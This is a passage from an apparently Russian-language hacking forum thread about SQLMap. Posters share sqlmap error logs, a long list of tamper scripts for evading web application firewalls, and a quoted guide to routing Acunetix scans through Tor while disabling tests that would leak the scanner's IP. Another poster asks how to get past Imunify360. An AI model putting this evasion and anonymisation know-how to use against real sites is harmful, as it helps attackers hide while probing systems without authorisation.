[03:59:37] [DEBUG] performed 0 queries in 0.00 seconds
[03:59:37] [CRITICAL] unable to retrieve the tables for any database
[03:59:37] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 13 times

dddg33 · 7 Apr 2021

После

Code:

--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

Выдал

Code:

[01:16:41] [CRITICAL] unable to retrieve the tables for any database
[01:16:41] [WARNING] HTTP error codes detected during run:
414 (Request-URI Too Long) - 4 times, 500 (Internal Server Error) - 1 times, 400 (Bad Request) - 1 times, 404 (Not Found) - 8 times
[01:16:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

Как можно обойти waf ?
Заранее спасибо!

Xsite · 21 Apr 2021

grimnir said: ↑

Приветствую, если версия 12 и 13 (в 10 он просто в настройках включается GUI ) то вот выдержка из моего мануала

1)Если нужна работа через тор
качаем privoxy_3.0.28
правим конфиг
forward-socks5t / 127.0.0.1:9150 .
forward-socks4 / 127.0.0.1:9150 .
forward-socks4a / 127.0.0.1:9150 .

12)C:\ProgramData\Acunetix\shared\general в файле settings.xml ищем слово proxy
и меняем на 127.0.0.1 порт 8118
13)Необязательный пункт!!! Теперь при скане сайта дополнительно в веб интерфейсе для каждого скана идем в вкладку HTTP и прописываем 127.0.0.1 порт 8118 (этот пункт оказался не обязательным ,если настройки прописаны в settings.xml)
Проверить работу можно отключив тор- сайт не будет сканится.

========================
чтобы не было утечки айпи при работе через тор нужно отключить следующие тесты ,которые используют порты в обход тор
Server tests:
Apache Tomcat AJP protocol audit
JMX and RMI
Java Debug Wire Protocol (JDWP) audit
Open SSL TLS Heartbleed
PHP Hash Collision DOS
TLS/SSL audit

Target Tests:
Apache Cassandra
FastGI Unauthorized Access
Memcached
Oracle Weblogic T3 XXE
Redis Unath
webLogic RCE
Apache Log4j socket
uWSGI

UPD по поводу зависания веб. Веб вообще не участвует в скане ,это просто оболочка для wvsc.exe его (WEB-GUI) можно даже закрыть, и все равно сканы будут идти. Чтобы зависаний не было ,не ставьте на сайт макимум потоков , лучше 2 деление слева при начале скана. И комп на ссд + минимально 6 Гб оперы + обязательно не использовать дефолт профиль скана ,где включены тесты ДДос, если у вас цель стоит поиск ошибок ,а не положить сайт.
Click to expand...

а есть где то полный мануал от тебя ?

Juiseppe · 1 May 2021

Кто нибудь мапом обходил Imunify360 (CloudLinux) waf ?

Вопросы по SQLMap

polzunki New Member

d_dwacawaca Member

Duble Member

Baskin-Robbins Reservists Of Antichat

brown Member

F1shka Elder - Старейшина

Duble Member

brown Member

polzunki New Member

erwerr2321 Elder - Старейшина

polzunki New Member

erwerr2321 Elder - Старейшина

Duble Member

Duble Member

d_dwacawaca Member

jonni80 New Member

dddg33 New Member

dddg33 New Member

Xsite Member

Juiseppe New Member

Useful Searches

Вопросы по SQLMap

polzunki New Member

d_dwacawaca Member

Duble Member

Baskin-Robbins Reservists Of Antichat

brown Member

F1shka Elder - Старейшина

Duble Member

brown Member

polzunki New Member

erwerr2321 Elder - Старейшина

polzunki New Member

erwerr2321 Elder - Старейшина

Duble Member

Duble Member

d_dwacawaca Member

jonni80 New Member

dddg33 New Member

dddg33 New Member

Xsite Member

Juiseppe New Member